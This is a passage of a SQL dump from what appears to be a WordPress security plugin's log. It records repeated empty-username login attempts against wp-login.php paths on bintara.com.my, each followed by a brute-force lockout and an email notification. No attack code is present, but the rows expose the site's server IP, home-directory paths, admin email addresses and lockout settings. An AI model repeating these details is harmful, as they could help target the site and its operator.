empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY5IHkXpgmG5P@iB8lC4wAAAJM\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:10:\"5.196.12.2\";s:11:\"REMOTE_PORT\";s:5:\"37952\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY5IHkXpgmG5P@iB8lC4wAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077536.1729\";s:12:\"REQUEST_TIME\";s:10:\"1569077536\";}}','notice','2019-09-21 14:52:17','2019-09-21 14:52:16',19133032,20622048,'https://bintara.com.my/wordpress/wp-login.php',1,0,'5.196.12.2'),(26413,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:52:16\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:52:16\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:52:16\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:52:16\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:52:17','2019-09-21 14:52:16',19217912,20622048,'https://bintara.com.my/wordpress/wp-login.php',1,0,'5.196.12.2'),(26414,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:52:17','2019-09-21 14:52:16',19425576,20622048,'https://bintara.com.my/wordpress/wp-login.php',1,0,'5.196.12.2'),(26415,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY5PXkXpgmG5P@iB8lDBQAAAI0\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"51.75.160.132\";s:11:\"REMOTE_PORT\";s:5:\"35102\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY5PXkXpgmG5P@iB8lDBQAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077565.8936\";s:12:\"REQUEST_TIME\";s:10:\"1569077565\";}}','notice','2019-09-21 14:52:47','2019-09-21 14:52:46',19134512,20622744,'https://bintara.com.my/test/wp-login.php',1,0,'51.75.160.132'),(26416,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:52:46\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:52:46\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:52:46\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:52:46\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:52:47','2019-09-21 14:52:46',19219264,20622744,'https://bintara.com.my/test/wp-login.php',1,0,'51.75.160.132'),(26417,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:52:47','2019-09-21 14:52:46',19427104,20622744,'https://bintara.com.my/test/wp-login.php',1,0,'51.75.160.132'),(26418,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY5Y3kXpgmG5P@iB8lDOwAAAII\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.162.61\";s:11:\"REMOTE_PORT\";s:5:\"42002\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY5Y3kXpgmG5P@iB8lDOwAAAII\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077603.8222\";s:12:\"REQUEST_TIME\";s:10:\"1569077603\";}}','notice','2019-09-21 14:53:25','2019-09-21 14:53:24',19134512,20622744,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.162.61'),(26419,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:53:24\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:53:24\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:53:24\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:53:24\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:53:25','2019-09-21 14:53:24',19219264,20622744,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.162.61'),(26420,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:53:25','2019-09-21 14:53:24',19427104,20622744,'https://bintara.com.my/2019/wp-login.php',1,0,'139.59.162.61'),(26421,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY5fXkXpgmG5P@iB8lDVAAAAIw\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"91.205.172.112\";s:11:\"REMOTE_PORT\";s:5:\"42612\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY5fXkXpgmG5P@iB8lDVAAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569077629.206\";s:12:\"REQUEST_TIME\";s:10:\"1569077629\";}}','notice','2019-09-21 14:53:50','2019-09-21 14:53:49',19133168,20623280,'https://bintara.com.my/wordpress/wp-login.php',1,0,'91.205.172.112'),(26422,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:53:49\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:53:49\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:53:49\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:53:49\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:53:50','2019-09-21 14:53:49',19218192,20623280,'https://bintara.com.my/wordpress/wp-login.php',1,0,'91.205.172.112'),(26423,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:53:50','2019-09-21 14:53:49',19425864,20623280,'https://bintara.com.my/wordpress/wp-login.php',1,0,'91.205.172.112'),(26424,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY5gnkXpgmG5P@iB8lDWQAAAIc\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.77.168\";s:11:\"REMOTE_PORT\";s:5:\"35354\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY5gnkXpgmG5P@iB8lDWQAAAIc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077634.9708\";s:12:\"REQUEST_TIME\";s:10:\"1569077634\";}}','notice','2019-09-21 14:53:56','2019-09-21 14:53:55',19134504,20624392,'https://bintara.com.my/wp/wp-login.php',1,0,'139.59.77.168'),(26425,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:53:55\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:53:55\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:53:55\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:53:55\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:53:56','2019-09-21 14:53:55',19219320,20624392,'https://bintara.com.my/wp/wp-login.php',1,0,'139.59.77.168'),(26426,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:53:56','2019-09-21 14:53:55',19426192,20624392,'https://bintara.com.my/wp/wp-login.php',1,0,'139.59.77.168'),(26427,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY5mnkXpgmG5P@iB8lDcAAAAIg\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"139.59.40.233\";s:11:\"REMOTE_PORT\";s:5:\"23266\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY5mnkXpgmG5P@iB8lDcAAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077658.5814\";s:12:\"REQUEST_TIME\";s:10:\"1569077658\";}}','notice','2019-09-21 14:54:20','2019-09-21 14:54:18',19135000,20625016,'https://bintara.com.my/test/wp-login.php',1,0,'139.59.40.233'),(26428,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login 